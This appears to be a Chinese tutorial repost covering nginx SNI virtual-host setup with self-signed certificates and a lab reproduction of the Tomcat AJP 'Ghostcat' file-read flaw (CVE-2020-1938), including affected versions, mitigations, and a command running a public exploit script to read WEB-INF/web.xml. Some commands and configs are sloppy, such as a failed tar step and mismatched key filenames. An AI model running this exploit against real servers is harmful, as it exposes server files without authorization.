概述
SNI
SNI产生背景
SNI(Server Name Indication)定义在RFC 4366,是一项用于改善SSL/TLS的技术,在SSLv3/TLSv1中被启用。它允许客户端在发起SSL握手请求时(具体说来,是客户端发出SSL请求中的ClientHello阶段),就提交请求的Host信息,使得服务器能够切换到正确的域并返回相应的证书。
SSL以及TLS(SSL的升级版)为客户端与服务器端进行安全连接提供了条件。但是,由于当时技术限制,SSL初期的设计顺应经典的公钥基础设施 PKI(Public Key Infrastructure)设计,PKI 认为一个服务器只为一个域名提供服务,从而一个服务器上也就只能使用一个证书。这样客户端在发送请求的时候,利用DNS域名解析,只要向解析到的IP地址(服务器地址)发送请求,然后服务器将自身唯一的证书返回回来,交给客户端验证,验证通过,则继续进行后续通信。然后通过协商好的加密通道,获得所需要的内容。这意味着服务器可以在 SSL 的启动动阶段发送或提交证书,因为它知道它在为哪个特定的域名服务。
一.前置环境搭建:
[root@localhost nginx]# mkdir certificate
[root@localhost nginx]# cd certificate/
[root@localhost certificate]# openssl genrsa -des3 -out ssl.key 4096
[root@localhost certificate]# openssl req -new -key ssl.key -out aaa.csr
[root@localhost certificate]# openssl x509 -req -days 365 -in aaa.csr -signkey ssl.key -out aaa.crt
[root@localhost certificate]# openssl genrsa -des3 -out ssl2.key 4096
[root@localhost certificate]# openssl req -new -key ssl2.key -out bbb.csr
[root@localhost certificate]# openssl x509 -req -days 365 -in bbb.csr -signkey ssl2.key -out bbb.crt
[root@localhost certificate]# cd /var/www/
[root@localhost www]# mkdir aaa
[root@localhost www]# mkdir bbb
[root@localhost www]# echo "this is a" > /var/www/aaa/index.html
[root@localhost www]# echo "this is b" > /var/www/bbb/index.html
在这里插入图片描述
修改本机hosts文件在C:WindowsSystem32driversetc下
在这里插入图片描述
单主机生效
双方使用同一个证书
server {
listen 443 ssl;
server_name www.aaa.com;
ssl_certificate /usr/local/nginx/certificate/aaa.crt;
ssl_certificate_key /usr/local/nginx/certificate/ssl.key;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /var/www/aaa;
index index.html index.htm;
}
}
server {
listen 443 ssl;
server_name www.bbb.com;
ssl_certificate /usr/local/nginx/certificate/aaa.crt;
ssl_certificate_key /usr/local/nginx/certificate/ssl.key;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /var/www/bbb;
index index.html index.htm;
}
}
证书与私钥的区分配置
server {
listen 443 ssl;
server_name www.aaa.com;
ssl_certificate /usr/local/nginx/certificate/aaa.crt;
ssl_certificate_key /usr/local/nginx/certificate/ssl.key;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /var/www/aaa;
index index.html index.htm;
}
}
server {
listen 443 ssl;
server_name www.bbb.com;
ssl_certificate /usr/local/nginx/certificate/bbb.crt;
ssl_certificate_key /usr/local/nginx/certificate/sslb.key;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /var/www/bbb;
index index.html index.htm;
}
}
端口号区分,证书区分
server {
listen 8443 ssl;
server_name www.bbb.com;
ssl_certificate /usr/local/nginx/certificate/bbb.crt;
ssl_certificate_key /usr/local/nginx/certificate/sslb.key;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /var/www/bbb;
index index.html index.htm;
}
}
server {
listen 8444 ssl;
server_name www.aaa.com;
ssl_certificate /usr/local/nginx/certificate/aaa.crt;
ssl_certificate_key /usr/local/nginx/certificate/ssl.key;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /var/www/aaa;
index index.html index.htm;
}
二.tomcat幽灵猫漏洞复现
漏洞编号:
CVE-2020-1938
CNVD-2020-10487
影响版本:
Apache Tomcat = 6
7 <= Apache Tomcat < 7.0.100
8 <= Apache Tomcat < 8.5.51
9 <= Apache Tomcat < 9.0.31
解决措施:
配置ajp配置中的secretRequired跟secret属性来限制认证 ;
临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connector port=“8009” protocol="AJP/1.3"redirectPort=“8443” /> ;
环境搭建(centos7安装git,如果有git则不用安装)
yum install git -y
安装完成后使用下面的命令克隆环境
git clone https://github.com/laolisafe/CVE-2020-1938
启动Apache,注意有先安装java环境
java环境安装
wget https://download.oracle.com/java/19/latest/jdk-19_linux-x64_bin.tar.gz
tar -zxvf jdk-19_linux-x64_bin.tar.gz
[root@localhost local]# tar -zxvf /usr/local/jdk-19_linux-x64_bin.
tar (child): /usr/local/jdk-19_linux-x64_bin.:无法 open: 没有那个文件或目录
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
tomcat环境安装
[root@localhost home]# wget https://dlcdn.apache.org/tomcat/tomcat-8/v8.5.85/bin/apache-tomcat-8.5.85.tar.gz
[root@localhost home]# tar -zxvf apache-tomcat-8.5.85.tar.gz
[root@localhost home]# mv apache-tomcat-8.5.85/ /usr/local/tomcat8.0
[root@localhost home]# cd /usr/local/
[root@localhost local]# ln -s /usr/local/tomcat8.0/ /usr/local/tomcat
[root@localhost local]# cd tomcat8.0/bin/
[root@localhost bin]# ls
bootstrap.jar commons-daemon-native.tar.gz setclasspath.sh tool-wrapper.bat
catalina.bat configtest.bat shutdown.bat tool-wrapper.sh
catalina.sh configtest.sh shutdown.sh version.bat
catalina-tasks.xml daemon.sh startup.bat version.sh
ciphers.bat digest.bat startup.sh
ciphers.sh digest.sh tomcat-juli.jar
commons-daemon.jar setclasspath.bat tomcat-native.tar.gz
[root@localhost bin]# vim catalina.sh
[root@localhost bin]# chmod +x *.sh
[root@localhost bin]# ./startup.sh (启动tomcat)
下载exp
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
这里读取WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml 192.168.221.130
最后
以上就是动人宝贝为你收集整理的SNI第三种模式复现/幽灵猫网络抓包方式复现/所有漏洞复现的全部内容,希望文章能够帮你解决SNI第三种模式复现/幽灵猫网络抓包方式复现/所有漏洞复现所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复